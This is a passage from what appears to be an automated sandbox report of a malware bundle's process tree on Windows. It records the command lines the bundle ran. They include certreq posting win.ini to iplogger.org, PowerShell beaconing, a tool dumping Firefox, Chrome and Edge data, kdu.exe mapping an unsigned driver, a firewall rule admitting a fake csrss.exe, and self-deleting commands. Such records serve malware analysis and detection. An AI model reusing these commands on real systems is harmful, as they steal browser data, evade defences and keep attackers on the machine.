C:\Program Files (x86)\JCleaner\jayson.exe"C:\Program Files (x86)\JCleaner\jayson.exe"10⤵PID:4332
-
C:\Program Files (x86)\JCleaner\jayson.exe"C:\Program Files (x86)\JCleaner\jayson.exe"11⤵PID:3244
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"10⤵PID:3968
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"10⤵PID:2476
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:2192
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:5196
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:1068
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:5208
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"10⤵PID:4480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hqnrcma0sv0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\hqnrcma0sv0\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\is-8B4BE.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-8B4BE.tmp\Setup3310.tmp" /SL5="$10386,802346,56832,C:\Users\Admin\AppData\Local\Temp\hqnrcma0sv0\Setup3310.exe" /Verysilent /subid=5779⤵PID:4484
-
C:\Users\Admin\AppData\Local\Temp\is-IF46A.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IF46A.tmp\Setup.exe" /Verysilent10⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\is-C3O3M.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-C3O3M.tmp\Setup.tmp" /SL5="$204DA,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-IF46A.tmp\Setup.exe" /Verysilent11⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\is-AFRJC.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-AFRJC.tmp\ProPlugin.exe" /Verysilent12⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\is-AM4DP.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-AM4DP.tmp\ProPlugin.tmp" /SL5="$50350,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-AFRJC.tmp\ProPlugin.exe" /Verysilent13⤵PID:2508
-
C:\Users\Admin\AppData\Local\Temp\is-DFHMJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DFHMJ.tmp\Setup.exe"14⤵PID:6564
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"15⤵PID:6840
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe16⤵
- Kills process with taskkill
PID:6984
-
-
C:\Windows\regedit.exeregedit /s chrome.reg16⤵
- Runs .reg file with regedit
PID:7000
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat16⤵PID:7104
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)17⤵PID:4040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\chrome64.bat" h"18⤵PID:6524
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"19⤵PID:5220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7ff9bbdb6e00,0x7ff9bbdb6e10,0x7ff9bbdb6e2020⤵PID:6512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1660 /prefetch:820⤵PID:6992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2240 /prefetch:820⤵PID:6344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:220⤵PID:7040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:120⤵PID:4328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:120⤵PID:1788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:120⤵PID:3956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:120⤵PID:5160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:120⤵PID:3592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:120⤵PID:5164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:820⤵PID:4876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4456 /prefetch:820⤵PID:6032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4448 /prefetch:820⤵PID:6960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4356 /prefetch:820⤵PID:4572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 /prefetch:820⤵PID:4652
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings20⤵PID:6380
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x1f4,0x248,0x7ff7ef257740,0x7ff7ef257750,0x7ff7ef25776021⤵PID:5920
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:820⤵PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5048 /prefetch:820⤵PID:6124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4368 /prefetch:820⤵PID:6700
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4344 /prefetch:820⤵PID:6476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1956 /prefetch:820⤵PID:6776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3856 /prefetch:820⤵PID:1272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3840 /prefetch:820⤵PID:5388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3428 /prefetch:820⤵PID:1408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4872 /prefetch:820⤵PID:5480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4232 /prefetch:820⤵PID:7148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3696 /prefetch:820⤵PID:6952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:820⤵PID:1392
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:820⤵PID:6496
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3640 /prefetch:820⤵PID:828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4456 /prefetch:820⤵PID:6644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4872 /prefetch:820⤵PID:6640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:820⤵PID:5908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:820⤵PID:6504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5292 /prefetch:820⤵PID:6208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3640 /prefetch:820⤵PID:6424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3884 /prefetch:820⤵PID:4112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5564 /prefetch:820⤵PID:4456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:820⤵PID:6304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5292 /prefetch:820⤵PID:6668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:120⤵PID:6500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:820⤵PID:6012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5184 /prefetch:820⤵PID:5900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3664 /prefetch:820⤵PID:6844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:820⤵PID:6588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4116 /prefetch:820⤵PID:6672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5300 /prefetch:820⤵PID:5984
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:820⤵PID:5564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:120⤵PID:2288
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:820⤵PID:3096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:820⤵PID:7320
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4912 /prefetch:820⤵PID:7404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5376 /prefetch:820⤵PID:7548
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5068 /prefetch:820⤵PID:7660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:120⤵PID:7652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3088 /prefetch:820⤵PID:7892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4200 /prefetch:820⤵PID:7960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4592 /prefetch:820⤵PID:5632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1600,2205324959349409227,15386510461107391059,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=5404 /prefetch:220⤵PID:7488
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg16⤵
- Runs .reg file with regedit
PID:1564
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b firefox16⤵PID:4024
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b chrome16⤵PID:3712
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exeparse.exe -f json -b edge16⤵PID:6600
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-AFRJC.tmp\DataFinder.exe"C:\Users\Admin\AppData\Local\Temp\is-AFRJC.tmp\DataFinder.exe" /Verysilent12⤵PID:7108
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\d0nvlnlci2p\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\d0nvlnlci2p\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\is-OT9GO.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-OT9GO.tmp\IBInstaller_97039.tmp" /SL5="$1041A,14464800,721408,C:\Users\Admin\AppData\Local\Temp\d0nvlnlci2p\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:4396
-
C:\Users\Admin\AppData\Local\Temp\is-NBKLQ.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-NBKLQ.tmp\{app}\chrome_proxy.exe"10⤵PID:2176
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-NBKLQ.tmp\{app}\chrome_proxy.exe"11⤵PID:4980
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:4816
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://dropskeyssellbuy.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:3160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wliya2d0vjn\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\wliya2d0vjn\setup_10.2_us3.exe" /silent8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4056
-
-
C:\Users\Admin\AppData\Local\Temp\bkx5f4bua2p\app.exe"C:\Users\Admin\AppData\Local\Temp\bkx5f4bua2p\app.exe" /8-238⤵
- Executes dropped EXE
PID:1008 -
C:\Users\Admin\AppData\Local\Temp\vSYPaNciKWVRpfnDqktD\kdu.exeC:\Users\Admin\AppData\Local\Temp\vSYPaNciKWVRpfnDqktD\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\vSYPaNciKWVRpfnDqktD\driver.sys9⤵PID:4876
-
-
C:\Users\Admin\AppData\Local\Temp\bkx5f4bua2p\app.exe"C:\Users\Admin\AppData\Local\Temp\bkx5f4bua2p\app.exe" /8-239⤵PID:3568
-
C:\Users\Admin\AppData\Local\Temp\TxMnlmEXJExPSFikZUxkoBWG\kdu.exeC:\Users\Admin\AppData\Local\Temp\TxMnlmEXJExPSFikZUxkoBWG\kdu.exe -map C:\Users\Admin\AppData\Local\Temp\TxMnlmEXJExPSFikZUxkoBWG\driver.sys10⤵PID:7112
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"10⤵PID:6232
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes11⤵PID:6580
-
